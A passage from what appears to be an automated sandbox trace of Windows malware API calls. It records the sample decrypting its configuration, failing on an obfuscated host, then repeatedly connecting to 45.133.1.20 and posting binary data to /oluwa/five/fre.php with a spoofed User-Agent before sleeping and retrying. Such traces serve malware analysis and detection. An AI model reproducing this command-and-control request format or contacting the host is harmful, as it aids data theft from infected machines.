Size=0x1fdc) returned 0x6dc730 [0270.392] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.392] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.393] GetProcessHeap () returned 0x6a0000 [0270.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0270.393] GetProcessHeap () returned 0x6a0000 [0270.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0270.393] send (s=0x980, buf=0x6bd460*, len=242, flags=0) returned 242 [0270.394] send (s=0x980, buf=0x6bb998*, len=159, flags=0) returned 159 [0270.394] GetProcessHeap () returned 0x6a0000 [0270.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0270.394] recv (in: s=0x980, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0270.465] GetProcessHeap () returned 0x6a0000 [0270.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0270.466] GetProcessHeap () returned 0x6a0000 [0270.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0270.466] GetProcessHeap () returned 0x6a0000 [0270.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba770 | out: hHeap=0x6a0000) returned 1 [0270.467] GetProcessHeap () returned 0x6a0000 [0270.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0270.468] closesocket (s=0x980) returned 0 [0270.469] GetProcessHeap () returned 0x6a0000 [0270.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0270.469] GetProcessHeap () returned 0x6a0000 [0270.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.469] GetProcessHeap () returned 0x6a0000 [0270.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0270.470] GetProcessHeap () returned 0x6a0000 [0270.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0270.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1704) returned 0x980 [0270.485] Sleep (dwMilliseconds=0xea60) [0270.487] GetProcessHeap () returned 0x6a0000 [0270.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0270.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.488] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.495] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0270.502] GetProcessHeap () returned 0x6a0000 [0270.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0270.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.506] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0270.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.507] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.507] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.508] GetProcessHeap () returned 0x6a0000 [0270.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0270.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.514] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0270.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.515] CryptDestroyKey (hKey=0x6ad060) returned 1 [0270.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.516] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0270.516] GetProcessHeap () returned 0x6a0000 [0270.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.517] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.518] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.519] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.520] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.520] GetProcessHeap () returned 0x6a0000 [0270.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0270.520] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.520] GetProcessHeap () returned 0x6a0000 [0270.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0270.521] GetProcessHeap () returned 0x6a0000 [0270.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.521] GetProcessHeap () returned 0x6a0000 [0270.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0270.522] GetProcessHeap () returned 0x6a0000 [0270.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0270.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.530] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0270.536] GetProcessHeap () returned 0x6a0000 [0270.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.538] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0270.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.539] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.540] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.540] GetProcessHeap () returned 0x6a0000 [0270.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.543] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0270.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.545] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0270.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.547] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0270.547] GetProcessHeap () returned 0x6a0000 [0270.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.551] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0270.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.552] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0270.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.553] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0270.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.554] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0270.554] GetProcessHeap () returned 0x6a0000 [0270.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0270.554] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0270.554] GetProcessHeap () returned 0x6a0000 [0270.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0270.554] socket (af=2, type=1, protocol=6) returned 0x984 [0270.555] connect (s=0x984, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0270.578] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0270.578] GetProcessHeap () returned 0x6a0000 [0270.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0270.578] GetProcessHeap () returned 0x6a0000 [0270.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0270.579] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.580] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.580] GetProcessHeap () returned 0x6a0000 [0270.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0270.580] GetProcessHeap () returned 0x6a0000 [0270.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0270.580] GetProcessHeap () returned 0x6a0000 [0270.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0270.582] GetProcessHeap () returned 0x6a0000 [0270.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0270.583] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.584] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.584] GetProcessHeap () returned 0x6a0000 [0270.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0270.585] GetProcessHeap () returned 0x6a0000 [0270.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0270.585] send (s=0x984, buf=0x6bd460*, len=242, flags=0) returned 242 [0270.586] send (s=0x984, buf=0x6bb998*, len=159, flags=0) returned 159 [0270.586] GetProcessHeap () returned 0x6a0000 [0270.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0270.586] recv (in: s=0x984, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0270.660] GetProcessHeap () returned 0x6a0000 [0270.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0270.660] GetProcessHeap () returned 0x6a0000 [0270.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0270.661] GetProcessHeap () returned 0x6a0000 [0270.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0270.661] GetProcessHeap () returned 0x6a0000 [0270.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0270.662] closesocket (s=0x984) returned 0 [0270.662] GetProcessHeap () returned 0x6a0000 [0270.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0270.662] GetProcessHeap () returned 0x6a0000 [0270.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.663] GetProcessHeap () returned 0x6a0000 [0270.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0270.664] GetProcessHeap () returned 0x6a0000 [0270.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0270.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x170c) returned 0x984 [0270.666] Sleep (dwMilliseconds=0xea60) [0270.668] GetProcessHeap () returned 0x6a0000 [0270.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0270.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.672] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.680] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0270.687] GetProcessHeap () returned 0x6a0000 [0270.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.689] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0270.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.693] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.721] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.721] GetProcessHeap () returned 0x6a0000 [0270.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.723] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0270.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.725] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0270.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.726] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0270.726] GetProcessHeap () returned 0x6a0000 [0270.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.728] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.729] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.731] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.732] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.732] GetProcessHeap () returned 0x6a0000 [0270.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0270.733] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.733] GetProcessHeap () returned 0x6a0000 [0270.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0270.734] GetProcessHeap () returned 0x6a0000 [0270.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.734] GetProcessHeap () returned 0x6a0000 [0270.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0270.734] GetProcessHeap () returned 0x6a0000 [0270.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0270.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.739] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.770] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0270.785] GetProcessHeap () returned 0x6a0000 [0270.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.786] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.787] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.789] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.789] GetProcessHeap () returned 0x6a0000 [0270.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.791] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0270.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.795] CryptDestroyKey (hKey=0x6ad020) returned 1 [0270.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.797] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0270.797] GetProcessHeap () returned 0x6a0000 [0270.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.798] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0270.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.800] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0270.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.808] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0270.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.809] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0270.809] GetProcessHeap () returned 0x6a0000 [0270.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0270.810] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0270.810] GetProcessHeap () returned 0x6a0000 [0270.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0270.810] socket (af=2, type=1, protocol=6) returned 0x988 [0270.811] connect (s=0x988, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0270.840] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0270.840] GetProcessHeap () returned 0x6a0000 [0270.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0270.841] GetProcessHeap () returned 0x6a0000 [0270.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0270.841] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.842] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.843] GetProcessHeap () returned 0x6a0000 [0270.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba770 [0270.843] GetProcessHeap () returned 0x6a0000 [0270.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0270.843] GetProcessHeap () returned 0x6a0000 [0270.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0270.843] GetProcessHeap () returned 0x6a0000 [0270.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0270.844] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.845] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.845] GetProcessHeap () returned 0x6a0000 [0270.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0270.845] GetProcessHeap () returned 0x6a0000 [0270.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0270.846] send (s=0x988, buf=0x6bd460*, len=242, flags=0) returned 242 [0270.847] send 